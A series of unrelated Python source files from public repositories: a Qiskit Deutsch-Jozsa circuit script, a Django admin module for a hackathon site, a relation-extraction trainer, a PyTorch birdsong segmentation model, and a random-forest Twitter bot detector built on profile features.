from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the oracle O_f^± for the boolean function ``f`` on ``n`` bits.

    For every input string on which ``f`` returns "1", the controls whose
    bit is "0" are sandwiched between X gates around a multi-controlled
    Toffoli onto the target qubit.
    (U1/P with lambda=180 would give a CZ; see issue #127 for a
    multi-controlled-Z alternative.)
    """
    controls = QuantumRegister(n, "ofc")
    target = QuantumRegister(1, "oft")
    oracle = QuantumCircuit(controls, target, name="Of")
    for value in range(2 ** n):
        bits = np.binary_repr(value, n)
        if f(bits) != "1":
            continue
        # Select the controls to invert so this bit pattern activates the MCT...
        inverted = [controls[pos] for pos in range(n) if bits[pos] == "0"]
        for qubit in inverted:
            oracle.x(qubit)
        oracle.mct(controls, target[0], None, mode='noancilla')
        # ...then undo the inversion.
        for qubit in inverted:
            oracle.x(qubit)
    return oracle
def make_circuit(n: int, f) -> QuantumCircuit:
    """Assemble the Deutsch-Jozsa style circuit around the oracle for ``f``."""
    qubits = QuantumRegister(n, "qc")
    ancilla = QuantumRegister(1, "qt")
    circuit = QuantumCircuit(qubits, ancilla)
    # Flip the ancilla (can be omitted when using O_f^±).
    circuit.x(ancilla)
    # Uniform superposition over the inputs.
    for idx in range(n):
        circuit.h(qubits[idx])
    circuit.h(qubits[1])  # number=1
    circuit.cx(qubits[0], qubits[1])  # number=2
    circuit.h(qubits[1])  # number=8
    circuit.cz(qubits[0], qubits[1])  # number=9
    circuit.h(qubits[1])  # number=10
    circuit.cx(qubits[0], qubits[1])  # number=7
    circuit.h(ancilla)
    circuit.barrier()
    # Apply the oracle O_f.
    circuit.append(
        build_oracle(n, f).to_gate(),
        [qubits[idx] for idx in range(n)] + [ancilla])
    # Transform back (QFT on Z_2^n is just H on every qubit).
    for idx in range(n):
        circuit.h(qubits[idx])
    circuit.barrier()
    circuit.x(qubits[0])  # number=3
    circuit.y(qubits[1])  # number=6
    circuit.x(qubits[0])  # number=4
    return circuit
if __name__ == '__main__':
    # Number of input qubits for the oracle.
    n = 2
    # Balanced function: output equals the last input bit.
    f = lambda rep: rep[-1]
    # f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
    # f = lambda rep: "0"
    prog = make_circuit(n, f)
    sample_shot =2800  # unused in this statevector run
    backend = BasicAer.get_backend('statevector_simulator')
    circuit1 = transpile(prog,FakeVigo())
    # NOTE(review): these two X gates cancel; presumably injected for
    # differential-testing purposes -- confirm before removing.
    circuit1.x(qubit=3)
    circuit1.x(qubit=3)
    prog = circuit1
    info = execute(prog, backend=backend).result().get_statevector()
    qubits = round(log2(len(info)))
    # Convert amplitudes to measurement probabilities keyed by bitstring.
    info = {
        np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
        for i in range(2 ** qubits)
    }
    writefile = open("../data/startQiskit_Class199.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
81b34f027b43532d60ef240b15a2b0a834d30265 | 4,135 | py | Python | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | null | null | null | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | 14 | 2018-08-23T23:54:37.000Z | 2020-04-29T23:44:18.000Z | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.contrib import admin
from django.urls import reverse
from django.shortcuts import redirect
from django.db import transaction
from django.utils.safestring import mark_safe
from .models import (
Hackathon,
Sponsor,
Tier,
Sponsorship,
Section,
SectionTemplate,
Attachment,
FAQ,
UsedFAQ,
Application,
Guardian,
Profile,
Address,
)
class SponsorshipInline(admin.TabularInline):
    """Inline editor for a hackathon's sponsorships."""
    model = Sponsorship
    extra = 1
class SectionInline(admin.TabularInline):
    """Inline editor for a hackathon's sections; attachments live on the
    section change page."""
    model = Section
    verbose_name_plural = "Sections (Follow change link to edit attachments)"
    extra = 1
    show_change_link = True
class AttachmentInline(admin.TabularInline):
    """Inline editor for a section's attachments."""
    model = Attachment
    extra = 1
class FAQInline(admin.TabularInline):
    """Inline editor for the FAQs attached to a hackathon (via UsedFAQ)."""
    model = UsedFAQ
    verbose_name_plural = "FAQs"
    extra = 1
class HackathonAdmin(admin.ModelAdmin):
    """Admin configuration for hackathons: grouped fieldsets plus inline
    sponsorships, FAQs and sections."""
    list_display = ("__unicode__", "end_date", "published", "open")
    fieldsets = (
        (None, {
            "fields": ("start_date", "end_date", "back_drop_image", "organizing_committee", "published")
        }),
        ("Sponsor Logos", {
            "description": "Platform sponsors will use these directly. Sponsor Tiers will compute their absolute value relative to these.",
            "fields": ("logo_max_height", "logo_max_side_margin", "logo_max_bottom_margin")
        }),
        ("Registration", {
            "fields": ("app_questions", "opens", "deadline", "early_note", "open_note", "closed_note")
        }),
    )
    inlines = (SponsorshipInline, FAQInline, SectionInline)
class SectionAdmin(admin.ModelAdmin):
    """Admin for sections; attachments are edited inline."""
    list_display = ("__unicode__", "hackathon")
    list_filter = ("hackathon",)
    inlines = (AttachmentInline,)
class AttachmentAdmin(admin.ModelAdmin):
    """Admin for attachments, filterable by owning section."""
    list_display = ("__unicode__", "section")
    list_filter = ("section",)
class FAQAdmin(admin.ModelAdmin):
    """Admin for FAQ entries, filterable by the 'general' flag."""
    list_display = ("__unicode__", "general")
    list_filter = ("general", )
def accept(modeladmin, request, queryset):
    """Admin action: accept every selected application atomically, then
    return to the application changelist."""
    with transaction.atomic():
        for app in queryset:
            app.accept()
    return redirect(reverse("admin:iquhack_application_changelist"))
accept.short_description = "Accept selected applications"
class ApplicationAdmin(admin.ModelAdmin):
    """Admin for hackathon applications.

    ``user``/``hackathon``/``accepted`` are read-only; acceptance happens via
    the ``accept`` bulk action.
    """
    list_display = ("__unicode__", "hackathon")
    list_filter = ("hackathon", "accepted")
    readonly_fields = ("user", "hackathon", "accepted")
    search_fields = ("user__email", "user__first_name", "user__last_name", "responses")
    actions = (accept, )
    def get_form(self, request, obj=None, **kwargs):
        # On change forms, turn the read-only user/hackathon fields into
        # links to their own admin pages via help_text.
        if obj:
            help_texts = {
                "user": mark_safe("<a href=%s>Go to user profile</a>"%reverse("admin:auth_user_change", args=[obj.user.id])),
                "hackathon": mark_safe("<a href=%s>Go to hackathon</a>"%reverse("admin:iquhack_hackathon_change", args=[obj.hackathon.id])),
            }
            kwargs.update({"help_texts": help_texts})
        return super(ApplicationAdmin, self).get_form(request, obj, **kwargs)
class GuardianInline(admin.TabularInline):
    """Inline editor for a profile's guardians."""
    model = Guardian
    extra = 1
class ProfileAdmin(admin.ModelAdmin):
    """Admin for hacker profiles, with guardians edited inline."""
    search_fields = ("user__email", "user__first_name", "user__last_name")
    inlines = (GuardianInline, )
    def get_form(self, request, obj=None, **kwargs):
        # On change forms, link the user field to its admin page via help_text.
        if obj:
            help_texts = {
                "user": mark_safe("<a href=%s>Go to user profile</a>"%reverse("admin:auth_user_change", args=[obj.user.id])),
            }
            kwargs.update({"help_texts": help_texts})
        return super(ProfileAdmin, self).get_form(request, obj, **kwargs)
# Register all iQuHACK models with the default admin site; models without an
# explicit ModelAdmin use Django's default.
admin.site.register(Hackathon, HackathonAdmin)
admin.site.register(Sponsor)
admin.site.register(Tier)
admin.site.register(FAQ, FAQAdmin)
admin.site.register(Section, SectionAdmin)
admin.site.register(SectionTemplate)
admin.site.register(Attachment, AttachmentAdmin)
admin.site.register(Application, ApplicationAdmin)
admin.site.register(Guardian)
admin.site.register(Profile, ProfileAdmin)
admin.site.register(Address)
0a571d96f60adf6a274a12cdee2a1205e32bb721 | 9,681 | py | Python | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | null | null | null | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | 1 | 2021-06-02T02:09:52.000Z | 2021-06-02T02:09:52.000Z | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | null | null | null | # coding:utf-8
import torch
import json
import sys
from torch.utils.data import DataLoader
import os
import pickle
import random
sys.path.append("/")
from opennre import encoder, model, framework
from opennre.framework.data_loader import SentenceREDataset
from opennre.framework.f1_metric import F1Metric
from example import configs as cf
from opennre.model.para_loss import PARALoss
from opennre.model.para_loss_softmax import PARALossSoftmax
import os
def train(dataset_name, batch_size=50, num_workers=2, max_epoch=15, lr=3e-5, weight_decay=1e-5, add_subject_loss=False,
          eval=False, continue_train=False, large_bert=False, subject_1=False, use_cls=True, softmax=False,
          opt='adam', seed=31415926535897932, cuda_device=0, sort=True, metric="micro_f1"
          ):
    """Train (or, with ``eval=True``, only evaluate) a PARA/REDN relation
    extraction model on ``dataset_name``.

    Datasets are loaded from ``cf.rootpath/<dataset_name>`` and cached as
    pickles; the best checkpoint is written under ``./ckpt``.  NOTE: the
    ``eval`` parameter shadows the builtin of the same name -- kept for
    backward compatibility with existing callers.
    """
    print("@@@@@@@@@@@ args @@@@@@@@@@@")
    print(locals())
    print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    os.environ["CUDA_VISIBLE_DEVICES"] = str(cuda_device)
    if seed is not None:
        torch.manual_seed(seed)
    root_path = cf.rootpath
    dataset_file = ["train.txt", "val.txt", "test.txt"]
    dataset_pkl_file = ["train.pkl", "val.pkl", "test.pkl"]
    # NOTE(review): both branches use cf.modelpath, so large_bert only
    # affects the checkpoint name ("1024" vs "768") -- confirm intent.
    if large_bert:
        bert_path, bert_large = cf.modelpath, True
    else:
        bert_path, bert_large = cf.modelpath, False
    # Checkpoint name encodes the ablation configuration.
    ckpt = './ckpt/%s_%s_%s_%s_%s_%s_bert.th' % (
        cf.outputname,
        dataset_name,
        "softmax" if softmax else "sigmoid",
        "withCLS" if use_cls else "withoutCLS",
        "-1" if subject_1 else "-2",
        "1024" if bert_large else "768",)

    def get_dataset(_model):
        # Load cached pickles when all three exist; otherwise build the
        # datasets from the raw files and cache them.
        if all(map(lambda x: os.path.exists(os.path.join(root_path, dataset_name, x)), dataset_pkl_file)):
            dataset = list(
                map(lambda x: pickle.load(open(os.path.join(root_path, dataset_name, x), "rb")), dataset_pkl_file))
            if softmax:
                list(map(lambda x: x.split(), dataset))
        else:
            dataset = list(
                map(lambda x: SentenceREDataset(path=os.path.join(root_path, dataset_name, x), rel2id=rel2id,
                                                tokenizer=_model.sentence_encoder.tokenize, kwargs=None,
                                                sort=sort),
                    dataset_file))
            list(map(lambda x, y: pickle.dump(x, open(os.path.join(root_path, dataset_name, y), "wb")), dataset,
                     dataset_pkl_file))
        # Dataset-specific preprocessing and NA-relation handling.
        if dataset_name in ["nyt10", "nyt10_1", "nyt10_2"]:
            list(map(lambda x: x.set_max_words(100), dataset))
            list(map(lambda x: x.remove_na(), dataset))
            # list(map(lambda x: x.remove_repeat(), dataset))
            list(map(lambda x: x.char_idx_to_word_idx(), dataset))
            for d in dataset:
                d.NA_id = -1
        if dataset_name in ["semeval_1"]:
            for d in dataset:
                d.NA_id = -1
        if dataset_name in ["webnlg", "webnlg_1"]:
            for d in dataset:
                d.NA_id = -1
        dataset_loader = list(map(
            lambda x: DataLoader(dataset=x, batch_size=batch_size, shuffle=False, pin_memory=True,
                                 num_workers=num_workers, collate_fn=SentenceREDataset.collate_fn), dataset))
        return dataset_loader
    rel2id = json.load(open(os.path.join(root_path, dataset_name, 'rel2id.json')))
    sentence_encoder = encoder.BERTHiddenStateEncoder(pretrain_path=bert_path)
    _model = model.PARA(sentence_encoder, len(rel2id), rel2id, num_token_labels=2, subject_1=subject_1, use_cls=use_cls)
    train_loader, val_loader, test_loader = get_dataset(_model)
    # nyt10 has no usable val split here, so validation runs on the test set.
    _framework = framework.SentenceRE(
        train_loader=train_loader,
        val_loader=val_loader if dataset_name not in ["nyt10", "nyt10_1"] else test_loader,
        test_loader=test_loader,
        model=_model,
        ckpt=ckpt,
        max_epoch=max_epoch,
        lr=lr,
        weight_decay=weight_decay,
        opt=opt,
        add_subject_loss=add_subject_loss,
        loss_func=PARALossSoftmax() if softmax else PARALoss(),
        metric=F1Metric(multi_label=not softmax,
                        na_id=train_loader.dataset.NA_id,
                        ignore_na=dataset_name == "semeval",
                        rel2id=rel2id,
                        print_error_prob=1
                        ),
    )
    if not eval:
        if continue_train:
            _framework.parallel_model.load_state_dict(torch.load(ckpt).state_dict())
        _framework.train_model(metric=metric)
    # Always evaluate the best checkpoint on the test split.
    _framework.parallel_model.load_state_dict(torch.load(ckpt).state_dict())
    # print("TRAIN---------------------------")
    # result = _framework.eval_model(_framework.train_loader)
    # print('Accuracy on test set: {}'.format(result['acc']))
    # print('Micro Precision: {}'.format(result['micro_p']))
    # print('Micro Recall: {}'.format(result['micro_r']))
    # print('Micro F1: {}'.format(result['micro_f1']))
    #
    # print("DEV---------------------------")
    # result = _framework.eval_model(_framework.val_loader)
    # print('Accuracy on test set: {}'.format(result['acc']))
    # print('Micro Precision: {}'.format(result['micro_p']))
    # print('Micro Recall: {}'.format(result['micro_r']))
    # print('Micro F1: {}'.format(result['micro_f1']))
    print("TEST---------------------------")
    result = _framework.eval_model(_framework.test_loader)
    print('Accuracy on test set: {}'.format(result['acc']))
    print('Micro Precision: {}'.format(result['micro_p']))
    print('Micro Recall: {}'.format(result['micro_r']))
    print('Micro F1: {}'.format(result['micro_f1']))
    # Optionally evaluate a hand-picked sample split when it exists.
    if os.path.exists(os.path.join(root_path, dataset_name, "test_sample.json")):
        test_sample_dataset = SentenceREDataset(path=os.path.join(root_path, dataset_name, "test_sample.json"), rel2id=rel2id,
                                                tokenizer=_model.sentence_encoder.tokenize, kwargs=None,
                                                sort=sort)
        test_sample_loader = DataLoader(dataset=test_sample_dataset, batch_size=batch_size, shuffle=False, pin_memory=True,
                                        num_workers=num_workers, collate_fn=SentenceREDataset.collate_fn)
        print("TEST-Sample--------------------")
        result = _framework.eval_model(test_sample_loader)
        print('Accuracy on test set: {}'.format(result['acc']))
        print('Micro Precision: {}'.format(result['micro_p']))
        print('Micro Recall: {}'.format(result['micro_r']))
        print('Micro F1: {}'.format(result['micro_f1']))
    _framework.metric.df.to_excel(os.path.join(root_path, dataset_name, "res.xlsx"))
def get_ablation_args(dataset, max_epoch, batch_size, **kwargs):
    """Build the four ablation configurations for ``train``.

    Starting from the base config (subject_1=False, use_cls=True,
    softmax=False, plus any ``kwargs`` overrides), each successive variant
    cumulatively flips one switch: subject_1, then use_cls, then softmax.

    Returns a list of four independent kwargs dicts.
    """
    config = {
        "dataset_name": dataset,
        "max_epoch": max_epoch,
        "batch_size": batch_size,
        "subject_1": False,
        "use_cls": True,
        "softmax": False,
    }
    config.update(kwargs)
    variants = []
    for override in ({}, {"subject_1": True}, {"use_cls": False}, {"softmax": True}):
        config.update(override)
        variants.append(config.copy())
    return variants
if __name__ == '__main__':
    # CLI: <dataset_name> <t|anything> [task_id]; "t" trains, otherwise eval.
    dataset_name = sys.argv[1]
    is_train = sys.argv[2] == "t"
    task_id = None
    if len(sys.argv) > 3:
        task_id = int(sys.argv[3])
    print("==========%s %s============" % (dataset_name, str(task_id)))
    # Each dataset family gets its own hyper-parameters; only the first
    # (baseline) ablation configuration is actually run.
    if dataset_name in ["semeval", "semeval_1"]:
        max_epoch = 50
        batch_size = 32
        args_list = get_ablation_args(dataset_name,
                                      max_epoch=max_epoch,
                                      batch_size=batch_size,
                                      cuda_device=1,
                                      # continue_train=True,
                                      # seed=None,
                                      eval=not is_train,
                                      )
        train(**args_list[0])
    elif dataset_name in ["nyt10", "nyt10_1", "nyt10_2"]:
        max_epoch = 100
        batch_size = 20
        args_list = get_ablation_args(dataset_name,
                                      max_epoch=max_epoch,
                                      batch_size=batch_size,
                                      cuda_device=3,
                                      lr=5e-5,
                                      sort=False,
                                      eval=not is_train,
                                      )
        train(**args_list[0])
    elif dataset_name in ["webnlg_orig", "webnlg", "webnlg_orig_1"]:
        max_epoch = 30
        batch_size = 20
        args_list = get_ablation_args(dataset_name,
                                      max_epoch=max_epoch,
                                      batch_size=batch_size,
                                      sort=False,
                                      cuda_device=3,
                                      continue_train=False,
                                      eval=not is_train,
                                      )
        train(**args_list[0])
    elif dataset_name in ["ske"]:
        max_epoch = 30
        batch_size = 20
        args_list = get_ablation_args(dataset_name,
                                      max_epoch=max_epoch,
                                      batch_size=batch_size,
                                      sort=False,
                                      cuda_device=0,
                                      continue_train=False,
                                      eval=not is_train,
                                      )
        train(**args_list[0])
7c96ce015a2d667da4d24423f4c760b40a7162ed | 5,460 | py | Python | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 26 | 2019-03-04T20:08:57.000Z | 2022-01-22T13:40:00.000Z | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 379 | 2019-03-03T12:16:05.000Z | 2022-03-29T13:44:46.000Z | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 12 | 2019-11-22T21:19:19.000Z | 2022-03-14T17:44:59.000Z | import torch
from torch import nn
from ..engine.model import Model
# absolute import to avoid name clash in model def below
import vak.metrics
class TeenyTweetyNet(nn.Module):
    """Scaled-down TweetyNet: a two-layer CNN followed by a bidirectional LSTM
    that emits per-time-bin class logits for spectrogram windows."""

    def __init__(
        self,
        num_classes,
        input_shape=(1, 513, 88),
        conv1_filters=8,
        conv1_kernel_size=(5, 5),
        conv1_padding=(0, 2),
        conv2_filters=16,
        conv2_kernel_size=(5, 5),
        conv2_padding=(0, 2),
        pool1_size=(8, 1),
        pool1_stride=(8, 1),
        pool2_size=(8, 1),
        pool2_stride=(8, 1),
        hidden_size=64,
    ):
        """TeenyTweetyNet model

        Parameters
        ----------
        num_classes : int
            number of classes to predict, e.g., number of syllable classes in an individual bird's song
        input_shape : tuple
            with 3 elements corresponding to dimensions of spectrogram windows: (channels, frequency bins, time bins).
            i.e. we assume input is a spectrogram and treat it like an image, typically with one channel,
            the rows are frequency bins, and the columns are time bins. Default is (1, 513, 88).
        conv1_filters : int
            Number of filters in first convolutional layer. Default is 8.
        conv1_kernel_size : tuple
            Size of kernels, i.e. filters, in first convolutional layer. Default is (5, 5).
        conv1_padding : tuple
            Zero-padding (rows, columns) applied by first convolutional layer. Default is (0, 2).
        conv2_filters : int
            Number of filters in second convolutional layer. Default is 16.
        conv2_kernel_size : tuple
            Size of kernels, i.e. filters, in second convolutional layer. Default is (5, 5).
        conv2_padding : tuple
            Zero-padding (rows, columns) applied by second convolutional layer. Default is (0, 2).
        pool1_size : two element tuple of ints
            Size of sliding window for first max pooling layer. Default is (8, 1).
        pool1_stride : two element tuple of ints
            Step size for sliding window of first max pooling layer. Default is (8, 1).
        pool2_size : two element tuple of ints
            Size of sliding window for second max pooling layer. Default is (8, 1).
        pool2_stride : two element tuple of ints
            Step size for sliding window of second max pooling layer. Default is (8, 1).
        hidden_size : int
            Number of features in the hidden state of the LSTM. Default is 64.
        """
        super().__init__()
        self.num_classes = num_classes
        self.input_shape = input_shape
        self.hidden_size = hidden_size

        self.cnn = nn.Sequential(
            nn.Conv2d(
                in_channels=self.input_shape[0],
                out_channels=conv1_filters,
                kernel_size=conv1_kernel_size,
                padding=conv1_padding,
            ),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=pool1_size, stride=pool1_stride),
            nn.Conv2d(
                in_channels=conv1_filters,
                out_channels=conv2_filters,
                kernel_size=conv2_kernel_size,
                padding=conv2_padding,
            ),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=pool2_size, stride=pool2_stride),
        )

        # determine number of features in output after stacking channels
        # we use the same number of features for hidden states
        # note self.num_hidden is also used to reshape output of cnn in self.forward method
        batch_shape = tuple((1,) + input_shape)
        tmp_tensor = torch.rand(batch_shape)
        # dry-run the CNN on a dummy batch to measure its output shape
        tmp_out = self.cnn(tmp_tensor)
        channels_out, freqbins_out = tmp_out.shape[1], tmp_out.shape[2]
        self.num_rnn_features = channels_out * freqbins_out

        self.rnn = nn.LSTM(
            input_size=self.num_rnn_features,
            hidden_size=self.hidden_size,
            num_layers=1,
            dropout=0,
            bidirectional=True,
        )

        # for self.fc, in_features = hidden_size * 2, because LSTM is bidirectional
        # so we get hidden forward + hidden backward as output
        self.fc = nn.Linear(self.hidden_size * 2, num_classes)

    def forward(self, x):
        features = self.cnn(x)
        # stack channels so that dimension order is (batch, num_rnn_features, num time bins)
        features = features.view(features.shape[0], self.num_rnn_features, -1)
        # now switch dimensions for feeding to rnn,
        # so dimension order is (num time bins, batch size, num_rnn_features)
        features = features.permute(2, 0, 1)
        rnn_output, (hidden, cell_state) = self.rnn(features)
        # permute back to (batch, time bins, features)
        # so we can project features down onto number of classes
        rnn_output = rnn_output.permute(1, 0, 2)
        logits = self.fc(rnn_output)
        # permute yet again
        # so that dimension order is (batch, classes, time steps)
        # because this is order that loss function expects
        return logits.permute(0, 2, 1)
class TeenyTweetyNetModel(Model):
    """Binds a TeenyTweetyNet network to its loss, optimizer and evaluation
    metrics so the engine can train and evaluate it."""

    @classmethod
    def from_config(cls, config, logger=None):
        """Build a TeenyTweetyNetModel from a config dict with ``network``,
        ``loss`` and ``optimizer`` sections."""
        net = TeenyTweetyNet(**config["network"])
        criterion = nn.CrossEntropyLoss(**config["loss"])
        optim = torch.optim.Adam(params=net.parameters(), **config["optimizer"])
        eval_metrics = {
            "acc": vak.metrics.Accuracy(),
            "levenshtein": vak.metrics.Levenshtein(),
            "segment_error_rate": vak.metrics.SegmentErrorRate(),
            "loss": torch.nn.CrossEntropyLoss(),
        }
        return cls(
            network=net,
            optimizer=optim,
            loss=criterion,
            metrics=eval_metrics,
            logger=logger,
        )
| 40.147059 | 118 | 0.614469 |
3e2060b9f86ce24a2b67624846bb0789c28cde45 | 5,643 | py | Python | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | 5 | 2021-08-10T14:15:18.000Z | 2022-03-09T07:06:19.000Z | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | null | null | null | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | null | null | null | import os
from sklearn.ensemble import RandomForestClassifier
import joblib
import datetime
import time
IDList = []
labelList = []
# finalList.txt rows look like: <index> <user id> <label>
with open('finalList.txt', 'r', encoding = 'utf-8') as src:
    for row in src:
        fields = row.split()
        IDList.append(fields[1])
        labelList.append(fields[2])
print('load done')

# Profile attributes that are consumed verbatim as numeric features.
featuretext = ['statuses_count', 'followers_count', 'friends_count', 'favourites_count',
               'listed_count', 'default_profile', 'profile_use_background_image', 'verified']
def loaddata(file):
    """Read a whitespace-separated file and return the first token of each line."""
    with open(file, 'r', encoding = 'utf-8') as handle:
        return [row.split()[0] for row in handle]
# ID lists for the fixed train / dev / test splits.
trainList = loaddata('listTrain.txt')
developList = loaddata('listDev.txt')
testList = loaddata('listTest.txt')
print('load done')

# Feature vectors and labels per split; filled by the extraction loop below.
traindata = []
trainlabel = []
devdata = []
devlabel = []
testdata = []
testlabel = []
def calchours(data):
    """Return the account age in whole hours, measured from the profile's
    ``created_at`` timestamp (Twitter's text format) to the fixed snapshot
    time 2020-08-20 17:00:00."""
    month_index = {'Jan': 1, 'Feb': 2, 'Mar': 3, 'Apr': 4, 'May': 5,
                   'Jun': 6, 'Jul': 7, 'Aug': 8, 'Sep': 9, 'Oct': 10,
                   'Nov': 11, 'Dec': 12}
    # created_at looks like: "Wed Oct 10 20:19:24 +0000 2018"
    fields = data['created_at'].split()
    hh, mm, ss = (int(part) for part in fields[3].split(':'))
    created = datetime.datetime(int(fields[5]), month_index[fields[1]],
                                int(fields[2]), hh, mm, ss)
    snapshot = datetime.datetime(2020, 8, 20, 17, 0, 0)
    delta = snapshot - created
    # Whole days converted to hours, plus the floored leftover hours.
    return delta.days * 24.0 + int(delta.seconds / 3600.0)
def calcnum(data):
    """Count the ASCII digit characters ('0'-'9') in *data*."""
    return sum(1 for ch in data if '0' <= ch <= '9')
def calclen(data):
    """Return the summed length of every item in *data*.

    For a plain string this equals ``len(data)`` (each character has length 1).
    """
    return sum(len(word) for word in data)
# Character n-gram count tables used by the screen-name likelihood feature.
unigram = {}
with open('unigram.txt', 'r', encoding = 'utf-8') as src:
    for row in src:
        fields = row.split()
        unigram[fields[0]] = int(fields[1])

bigram = {}
with open('bigram.txt', 'r', encoding = 'utf-8') as src:
    for row in src:
        fields = row.split()
        bigram[(fields[0], fields[1])] = int(fields[2])
print('gram load done')
def calclikely(data):
    """Geometric mean of character-bigram transition probabilities over *data*
    (which must have at least 2 items), using the module-level ``unigram`` and
    ``bigram`` count tables.

    Unseen bigrams (or a zero unigram count) contribute probability 0, which
    drives the whole product — and hence the result — to 0.
    """
    ans = 1
    for index in range(len(data) - 1):
        word0 = data[index]
        word1 = data[index+1]
        # Narrowed from a bare ``except:``: only a missing table entry or a
        # zero unigram count should fall back to probability 0; anything else
        # (e.g. a corrupted table) should surface as an error.
        try:
            tmp = bigram[(word0, word1)] / unigram[word0]
        except (KeyError, ZeroDivisionError):
            tmp = 0
        ans = ans * tmp
    # Normalize by the number of transitions (geometric mean).
    ans = ans ** (1 / (len(data) - 1))
    return ans
# Build the per-user feature vectors (Yang-style profile features) and route
# each one into its train / dev / test bucket.
cnt = 0
for index in range(len(IDList)):
    cnt += 1
    if cnt % 1000 == 0:
        print(cnt)
    ID = IDList[index]
    label = labelList[index]
    # profile/<ID>_pro.txt alternates key lines and value lines.
    data = []
    with open('profile/' + ID + '_pro.txt', 'r', encoding = 'utf-8') as f:
        for line in f:
            data.append(line.strip())
    user = {}
    for i in range(int(len(data) / 2)):
        user[data[i*2]] = data[i*2+1]
    feature = []
    # Rate features: raw counts normalised by account age in hours.
    user_age = calchours(user)
    feature.append(int(user['statuses_count']) / user_age)
    feature.append(int(user['followers_count']) / user_age)
    feature.append(int(user['friends_count']) / user_age)
    feature.append(int(user['favourites_count']) / user_age)
    feature.append(int(user['listed_count']) / user_age)
    # Follower/friend ratio; max(1, ...) avoids division by zero.
    feature.append(int(user['followers_count']) / max(1, int(user['friends_count'])))
    # Name-shape features: lengths, digit counts and bigram likelihood.
    feature.append(len(user['screen_name']))
    feature.append(calcnum(user['screen_name']))
    feature.append(len(user['name']))
    feature.append(calcnum(user['name']))
    feature.append(calclen(user['description']))
    feature.append(calclikely(user['screen_name']))
    # Normalise empty / NULL / boolean strings to '0'/'1' before int().
    for key in user:
        if user[key] == '' or user[key] == 'NULL' or user[key] == 'False':
            user[key] = '0'
        if user[key] == 'True':
            user[key] = '1'
    for key in featuretext:
        feature.append(int(user[key]))
    # Append this user's feature row to feature.txt for later reuse.
    with open('feature.txt', 'a', encoding = 'utf-8') as f:
        f.write(ID + ' ')
        for key in feature:
            f.write(str(key) + ' ')
        f.write('\n')
    if ID in trainList:
        traindata.append(feature)
        trainlabel.append(label)
    elif ID in developList:
        devdata.append(feature)
        devlabel.append(label)
    elif ID in testList:
        testdata.append(feature)
        testlabel.append(label)
print('load done')
print(len(testdata))
def Metric(truth, pred):
    """Print binary-classification metrics for string labels ('1' = positive,
    '0' = negative) and return the accuracy."""
    TP = FP = TN = FN = 0
    for gold, guess in zip(truth, pred):
        if gold == '1' and guess == '1':
            TP += 1
        elif gold == '0' and guess == '1':
            FP += 1
        elif gold == '0' and guess == '0':
            TN += 1
        elif gold == '1' and guess == '0':
            FN += 1
    acc = (TP + TN) / (TP + FP + TN + FN)
    precision = TP / (TP + FP)
    recall = TP / (TP + FN)
    specificity = TN / (TN + FP)
    F1 = 2 / (recall ** -1 + precision ** -1)
    MCC = (TP * TN - FP * FN) / ((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN)) ** 0.5
    print('precision:', precision)
    print('recall:', recall)
    print('specificity:', specificity)
    print('F1:', F1)
    print('MCC:', MCC)
    print('acc:', acc)
    return acc
# Random-forest baseline over the hand-crafted profile features.
clf = RandomForestClassifier(random_state=0, max_depth = 10, verbose = True)
print('training start')
clf.fit(traindata, trainlabel)
print('train end')
devpred = clf.predict(devdata)
testpred = clf.predict(testdata)
print('dev data')
dev_acc = Metric(devlabel, devpred)
print('test data')
test_acc = Metric(testlabel, testpred)
# Persist the model, tagging the filename with dev/test accuracy scaled by 1e4.
joblib.dump(clf, 'models/model_' + str(int(dev_acc * 10000)) + '_' + str(int(test_acc * 10000)) + '.m')
082e32c506a4a55180dcedb5a1c87f250b1bc07f | 4,500 | py | Python | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
